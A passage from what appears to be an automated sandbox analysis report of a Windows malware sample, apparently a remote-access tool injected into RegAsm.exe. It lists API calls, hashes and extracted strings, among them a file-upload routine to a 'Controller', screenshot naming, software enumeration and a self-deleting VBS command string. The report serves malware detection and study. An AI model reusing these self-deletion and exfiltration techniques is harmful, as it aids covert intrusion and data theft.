                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CF84
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                          • _wcslen.LIBCMT ref: 0040CFC6
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                          • ExitProcess.KERNEL32 ref: 0040D062
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                          • API String ID: 1579085052-2309681474
                                                          • Opcode ID: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                          • Opcode Fuzzy Hash: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041C036
                                                          • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                          • lstrlenW.KERNEL32(?), ref: 0041C067
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                          • _wcslen.LIBCMT ref: 0041C13B
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                          • GetLastError.KERNEL32 ref: 0041C173
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                          • GetLastError.KERNEL32 ref: 0041C1D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                          • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                          • API String ID: 4218353326-230879103
                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                          • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                          • API String ID: 2490988753-744132762
                                                          • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                          • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                          • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                          • GetCursorPos.USER32(?), ref: 0041D5E9
                                                          • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                          • ExitProcess.KERNEL32 ref: 0041D665
                                                          • CreatePopupMenu.USER32 ref: 0041D66B
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                          • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                          • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                          • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                          • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                          • __aulldiv.LIBCMT ref: 00408D4D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                          • API String ID: 3086580692-2582957567
                                                          • Opcode ID: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                          • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                          • Opcode Fuzzy Hash: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                          • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                          • _free.LIBCMT ref: 004512FF
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00451321
                                                          • _free.LIBCMT ref: 00451336
                                                          • _free.LIBCMT ref: 00451341
                                                          • _free.LIBCMT ref: 00451363
                                                          • _free.LIBCMT ref: 00451376
                                                          • _free.LIBCMT ref: 00451384
                                                          • _free.LIBCMT ref: 0045138F
                                                          • _free.LIBCMT ref: 004513C7
                                                          • _free.LIBCMT ref: 004513CE
                                                          • _free.LIBCMT ref: 004513EB
                                                          • _free.LIBCMT ref: 00451403
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                          • _free.LIBCMT ref: 10007CFB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10007D1D
                                                          • _free.LIBCMT ref: 10007D32
                                                          • _free.LIBCMT ref: 10007D3D
                                                          • _free.LIBCMT ref: 10007D5F
                                                          • _free.LIBCMT ref: 10007D72
                                                          • _free.LIBCMT ref: 10007D80
                                                          • _free.LIBCMT ref: 10007D8B
                                                          • _free.LIBCMT ref: 10007DC3
                                                          • _free.LIBCMT ref: 10007DCA
                                                          • _free.LIBCMT ref: 10007DE7
                                                          • _free.LIBCMT ref: 10007DFF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00419FB9
                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                          • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                          • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                          • API String ID: 489098229-1431523004
                                                          • Opcode ID: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                          • Opcode Fuzzy Hash: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                            • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                            • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                            • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                          • ExitProcess.KERNEL32 ref: 0040D9C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                          • API String ID: 1913171305-3159800282
                                                          • Opcode ID: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                          • Opcode Fuzzy Hash: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                          • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                          • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                          APIs
                                                            • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                          • GetLastError.KERNEL32 ref: 00455CEF
                                                          • __dosmaperr.LIBCMT ref: 00455CF6
                                                          • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                          • GetLastError.KERNEL32 ref: 00455D0C
                                                          • __dosmaperr.LIBCMT ref: 00455D15
                                                          • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                          • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                          • GetLastError.KERNEL32 ref: 00455EB1
                                                          • __dosmaperr.LIBCMT ref: 00455EB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
